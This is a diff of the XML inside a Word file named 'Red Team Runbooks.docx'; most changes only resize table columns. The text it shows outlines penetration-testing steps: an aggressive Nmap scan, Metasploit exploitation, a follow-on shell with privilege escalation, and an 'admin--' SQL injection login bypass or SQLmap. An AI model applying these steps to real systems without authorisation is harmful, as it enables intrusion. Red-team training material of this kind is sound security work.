                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t xml:space="preserve">se </w:t>
-            </w:r>
+              <w:t>se exploit name</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="SourceText"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>exploit name</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="SourceText"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
               <w:t>set targets – ip and port</w:t>
             </w:r>
           </w:p>
@@ -1017,7 +998,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1075,7 +1056,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1103,7 +1084,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1162,7 +1143,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1189,7 +1170,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1247,7 +1228,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1275,7 +1256,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1334,7 +1315,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1363,23 +1344,13 @@
                 <w:shd w:fill="auto" w:val="clear"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">The shell should automatically connect and you should have access. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:shd w:fill="auto" w:val="clear"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Priv Esc if needed</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+              <w:t>The shell should automatically connect and you should have access. Priv Esc if needed</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1494,12 +1465,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1527"/>
-        <w:gridCol w:w="495"/>
+        <w:gridCol w:w="1526"/>
+        <w:gridCol w:w="496"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1758"/>
-        <w:gridCol w:w="1284"/>
+        <w:gridCol w:w="1759"/>
+        <w:gridCol w:w="1283"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1959,7 +1930,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1527" w:type="dxa"/>
+            <w:tcW w:w="1526" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2006,7 +1977,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8117" w:type="dxa"/>
+            <w:tcW w:w="8118" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2066,7 +2037,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2094,7 +2065,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2153,7 +2124,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2200,7 +2171,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2258,7 +2229,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2286,7 +2257,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2345,7 +2316,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2421,7 +2392,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2479,7 +2450,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2507,7 +2478,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2566,7 +2537,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2635,6 +2606,26 @@
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
               <w:t>admin--</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>or use SQLmap</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2677,7 +2668,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2735,7 +2726,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2763,7 +2754,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2822,7 +2813,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2857,7 +2848,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2961,12 +2952,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1527"/>
-        <w:gridCol w:w="495"/>
+        <w:gridCol w:w="1526"/>
+        <w:gridCol w:w="496"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1758"/>
-        <w:gridCol w:w="1284"/>
+        <w:gridCol w:w="1759"/>
+        <w:gridCol w:w="1283"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -3426,7 +3417,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1527" w:type="dxa"/>
+            <w:tcW w:w="1526" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3473,7 +3464,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8117" w:type="dxa"/>
+            <w:tcW w:w="8118" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3533,7 +3524,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3561,7 +3552,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3620,7 +3611,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3668,7 +3659,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3726,7 +3717,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3754,7 +3745,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3813,7 +3804,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3842,7 +3833,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3900,7 +3891,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3928,7 +3919,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3987,7 +3978,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4035,7 +4026,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -4093,7 +4084,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -4121,7 +4112,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4180,7 +4171,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6338" w:type="dxa"/>
+            <w:tcW w:w="6339" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4215,7 +4206,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1284" w:type="dxa"/>
+            <w:tcW w:w="1283" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>

--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1526"/>
-        <w:gridCol w:w="496"/>
+        <w:gridCol w:w="1525"/>
+        <w:gridCol w:w="497"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1759"/>
-        <w:gridCol w:w="1283"/>
+        <w:gridCol w:w="1760"/>
+        <w:gridCol w:w="1282"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1526" w:type="dxa"/>
+            <w:tcW w:w="1525" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8118" w:type="dxa"/>
+            <w:tcW w:w="8119" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -570,7 +570,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>This document is to scan a server and find vulnerable services to later be exploited with metasploit</w:t>
+              <w:t xml:space="preserve">This document is to scan a server and find vulnerable services to later be exploited with metasploit </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -609,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -637,7 +637,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -696,7 +696,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -717,7 +717,14 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service</w:t>
+              <w:t xml:space="preserve">Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Look for things like ftp, smb, jenkins installs etc.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -762,7 +769,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -820,7 +827,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -848,7 +855,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -907,7 +914,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -928,7 +935,14 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Run the MSFconsole and select the exploit for the vulnerable service</w:t>
+              <w:t xml:space="preserve">Run the MSFconsole and select the exploit for the vulnerable service </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>(if the module doesn’t work, try the exploit manually)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -998,7 +1012,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1056,7 +1070,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1084,7 +1098,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1143,7 +1157,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1170,7 +1184,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1228,7 +1242,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1256,7 +1270,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1315,7 +1329,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1350,7 +1364,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1465,12 +1479,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1526"/>
-        <w:gridCol w:w="496"/>
+        <w:gridCol w:w="1525"/>
+        <w:gridCol w:w="497"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1759"/>
-        <w:gridCol w:w="1283"/>
+        <w:gridCol w:w="1760"/>
+        <w:gridCol w:w="1282"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1930,7 +1944,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1526" w:type="dxa"/>
+            <w:tcW w:w="1525" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1977,7 +1991,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8118" w:type="dxa"/>
+            <w:tcW w:w="8119" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2037,7 +2051,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2065,7 +2079,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2124,7 +2138,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2171,7 +2185,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2229,7 +2243,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2257,7 +2271,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2316,7 +2330,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2392,7 +2406,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2450,7 +2464,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2478,7 +2492,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2537,7 +2551,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2668,7 +2682,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2726,7 +2740,7 @@
         </w:tc>
